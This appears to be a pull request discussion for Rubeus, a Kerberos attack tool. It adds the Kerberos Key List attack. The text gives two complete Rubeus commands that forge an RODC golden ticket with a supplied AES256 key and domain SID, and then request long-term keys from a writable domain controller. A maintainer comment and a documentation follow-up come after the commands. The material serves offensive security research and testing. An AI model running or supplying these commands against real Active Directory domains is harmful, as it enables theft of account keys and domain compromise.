Kerberos Key-List-Request and Replies

[JoeDibley]

Implemented code to complete the Kerberos Key List attack. This attack is completed by forging RODC (or AzureADSync RODC) TGTs and then requesting the long term key from a writable domain controller.

Example usage:
Step 1 - Create TGT
Generate Golden Ticket using KRBTGT_11442 account (rodcNumber + aes256 hash) to get the partial TGT for UserAllow with rid of 4234 in domain.local

.\Rubeus.exe golden /rodcNumber:11442  /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:Ticket.kirbi /aes256:1815C6750A6340A2326AE63FA10CE5DD3FCB4AE921A5662622543412D97D6E5A /user:UserAllow /id:4234 /domain:domain.local /sid:S-1-5-21-2085466279-113730185-1406233153

Step 2 - Create and send TGS request to DC
Now we have our forged TGT (ticket.kirbi), we use asktgs to send a keyList request to a writable domain controller for krbtgt service.

.\Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:Ticket.kirbi /service:krbtgt/domain.local 

Screenshots

References:

• SecureAuth's The Kerberos Key List Attack blog is here
• The PR for implementation in Impacket is here
• MS-KILE:
  • Key List Request
  • KERB-KEY-LIST-REQ
  • KERB-KEY-LIST-REP

[0xe7]

Great work, I was waiting for @eladshamir's post (https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) to include the code I'd written for this but you beat us to it. Did you add the documentation to the README and Info.cs?

[JoeDibley]

Thanks! I have updated the README and info.cs now